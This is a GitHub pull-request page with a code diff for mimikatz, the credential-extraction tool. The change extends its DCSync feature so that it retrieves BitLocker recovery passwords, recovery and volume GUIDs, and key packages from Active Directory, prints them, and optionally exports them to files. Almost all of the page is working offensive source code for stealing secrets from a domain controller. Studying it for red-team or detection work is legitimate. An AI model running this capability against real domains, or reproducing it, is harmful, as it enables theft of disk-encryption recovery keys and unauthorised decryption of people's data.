Skip to content

Commit 17669a9

Browse files
gentilkiwigentilkiwi
authored
Merge pull request #371 from matrix/dcsync_bitlocker
Dump ms-FVE-RecoveryInformation (Bitlocker Recovery Information) with DCSync
2 parents 57bad57 + 0581c93 commit 17669a9

File tree

3 files changed

+91
-1
lines changed

3 files changed

+91
-1
lines changed

mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c

Lines changed: 83 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
1616
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
1717
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
1818
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
19+
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
1920
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
2021
szOID_ANSI_currentValue,
2122
szOID_isDeleted,
@@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
2526
szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
2627
szOID_ANSI_userAccountControl,
2728
szOID_ANSI_unicodePwd,
29+
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
30+
szOID_ANSI_currentValue,
2831
szOID_isDeleted,
2932
};
3033
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
@@ -236,9 +239,12 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
236239
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
237240
{
238241
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
242+
239243
kprintf(L"\n");
240244
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
241245
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
246+
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
247+
kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
242248
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
243249
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
244250
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
@@ -292,6 +298,82 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
292298
return target;
293299
}
294300

301+
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
302+
{
303+
UNICODE_STRING recoveryGuid, uString;
304+
wchar_t* shortname = NULL;
305+
DWORD szData = 0;
306+
PVOID data = 0;
307+
308+
recoveryGuid.Length = 0;
309+
310+
kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
311+
312+
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
313+
{
314+
if(NT_SUCCESS(RtlStringFromGUID(data, &uString)))
315+
{
316+
kprintf(L"Volume GUID : %wZ\n", &uString);
317+
RtlFreeUnicodeString(&uString);
318+
}
319+
}
320+
321+
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &data, NULL))
322+
{
323+
if(NT_SUCCESS(RtlStringFromGUID(data, &recoveryGuid)))
324+
{
325+
kprintf(L"Recovery GUID : %wZ\n", &recoveryGuid);
326+
}
327+
}
328+
329+
if(someExport)
330+
{
331+
if(recoveryGuid.Length <= 0)
332+
{
333+
recoveryGuid.Buffer = kull_m_string_getRandomGUID();
334+
recoveryGuid.Length = (USHORT)wcslen(recoveryGuid.Buffer);
335+
kprintf(L"Recovery GUID (fake) : %wZ\n", &recoveryGuid);
336+
}
337+
shortname = recoveryGuid.Buffer;
338+
}
339+
340+
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
341+
{
342+
if(szData > 0)
343+
{
344+
kprintf(L"Recovery Password : %s\n", data);
345+
346+
if(someExport)
347+
{
348+
PWCHAR filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, shortname, L"recoveryPassword");
349+
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
350+
LocalFree(filename);
351+
}
352+
}
353+
}
354+
355+
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
356+
{
357+
if(szData > 0)
358+
{
359+
kprintf(L"Key Package Size : %u byte(s)\n", szData);
360+
kprintf(L"Key Package : [");
361+
kull_m_string_wprintf_hex(data, szData, 0);
362+
kprintf(L"]\n");
363+
364+
if (someExport)
365+
{
366+
PWCHAR filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, shortname, L"keyPackage");
367+
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
368+
LocalFree(filename);
369+
}
370+
}
371+
}
372+
373+
if (recoveryGuid.Length > 0)
374+
RtlFreeUnicodeString(&recoveryGuid);
375+
}
376+
295377
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
296378
{
297379
DWORD rid = 0, i;
@@ -3046,4 +3128,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
30463128
ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
30473129
{
30483130
return STATUS_SUCCESS;
3049-
}
3131+
}

mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,7 @@
1212
#include "../modules/rpc/kull_m_rpc_drsr.h"
1313
#include "../kuhl_m.h"
1414
#include "../kuhl_m_lsadump.h" // to move
15+
#include "../modules/kull_m_string.h"
1516

1617
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
1718
NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
@@ -46,6 +47,7 @@ void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
4647
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
4748
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
4849
void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
50+
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
4951
void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);
5052

5153
typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);

modules/rpc/kull_m_rpc_drsr.h

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -188,6 +188,12 @@ typedef enum {
188188
#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
189189
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
190190

191+
// bitlocker
192+
#define szOID_ANSI_msFVERecoveryPassword "1.2.840.113556.1.4.1964"
193+
#define szOID_ANSI_msFVERecoveryGuid "1.2.840.113556.1.4.1965"
194+
#define szOID_ANSI_msFVEVolumeGuid "1.2.840.113556.1.4.1998"
195+
#define szOID_ANSI_msFVEKeyPackage "1.2.840.113556.1.4.1999"
196+
191197
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
192198
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
193199
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"

0 commit comments

Comments
 (0)